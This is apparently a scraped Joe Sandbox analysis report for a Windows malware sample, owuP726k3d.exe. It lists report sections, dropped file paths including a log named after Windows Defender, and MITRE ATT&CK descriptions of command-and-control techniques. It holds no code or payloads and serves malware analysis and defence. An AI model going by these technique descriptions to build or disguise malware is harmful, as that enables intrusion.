
Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Windows Defender.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\Log.tmp

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0nx1v3hw.fij.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_14togbwg.ute.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_342w5sga.kmf.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_41bky102.isw.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ztbimda.0ta.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ber4toij.pl1.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bqeupybr.nad.psm1

Windows Analysis Report
owuP726k3d.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre